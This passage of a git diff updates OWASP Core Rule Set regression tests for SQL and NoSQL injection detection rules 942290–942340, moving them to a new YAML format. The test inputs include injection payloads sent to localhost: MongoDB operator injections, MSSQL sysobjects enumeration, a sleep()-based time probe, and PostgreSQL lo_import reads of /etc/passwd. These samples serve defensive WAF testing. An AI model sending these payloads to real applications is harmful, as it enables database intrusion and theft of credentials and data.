text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 3 desc: "basic MongoDB NOSQL injection attempts 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 4 desc: "basic MongoDB NOSQL injection attempts 3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 5 desc: "basic MongoDB NOSQL injection attempts 4" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$not": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$not": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 6 desc: "basic MongoDB NOSQL injection attempts 5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$nor": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$nor": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 7 desc: "basic MongoDB NOSQL injection attempts 6" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$where": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$where": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 8 desc: "basic MongoDB NOSQL injection attempts 7" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$elemMatch": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$elemMatch": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 9 desc: "basic MongoDB NOSQL injection attempts 8" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$text": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$text": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index f6a801990..4d19c2760 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -1,58 +1,56 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None - enabled: true - name: 942300.yaml +rule_id: 942300 tests: - - test_title: 942300-1 + - test_id: 1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942300] + - test_id: 2 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942300] + - test_id: 3 desc: "No false positives with for. Issue #2007" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=booked%20for%202021%28including%202020" - version: HTTP/1.0 - output: - no_log_contains: id "942300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942300] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 1e34f1e4f..e198085a0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -1,63 +1,61 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942310.yaml +rule_id: 942310 tests: - - test_title: 942310-1 + - test_id: 1 desc: | Chained SQL injection attempts 2/2. This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). This test now checks that no match occurs for something that would have matched the original expression. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - no_log_contains: id "942310" - - test_title: 942310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942310] + - test_id: 2 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" - version: HTTP/1.0 - output: - log_contains: id "942310" - - test_title: 942310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] + - test_id: 3 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" - version: HTTP/1.0 - output: - log_contains: id "942310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 94b3ae37f..59c8ca3dd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -1,219 +1,217 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None - enabled: true - name: 942320.yaml +rule_id: 942320 tests: - - test_title: 942320-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 5 desc: "Detects PostgreSQL data conversion with ::int" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=password::int" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=password::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 6 desc: "Detects PostgreSQL data conversion with ::bool" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 7 desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div(23,-2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 8 desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div+(23.23+,+2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 9 desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 10 desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_get(16400)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 11 desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::text" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 12 desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::bigint" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 13 desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::double%20precision" - version: HTTP/1.0 - output: - log_contains: id "942320" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index 2ebdb6753..5a111a28a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -1,38 +1,37 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 942321.yaml +rule_id: 942321 tests: - - test_title: 942321-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16200),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" - - test_title: 942321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: overlay(password placing $$$$ from 1)::int and id=1 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 6cee8d0ce..5f3f31499 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml @@ -1,94 +1,92 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942330.yaml +rule_id: 942330 tests: - - test_title: 942330-1 + - test_id: 1 desc: "classic SQL injection probings 1/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 2 desc: "Test first backslash match ([\"'`\x5c]*?)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\\"1 or 1-" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 3 desc: "Test second backslash match (\x5cx(?:23|27|3d))" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\x23" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\x23" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 4 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - "var=05111222333 - andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" - - test_title: 942330-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] + - test_id: 5 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=05111222333 andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 901d8a697..88a871dbf 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -1,191 +1,189 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 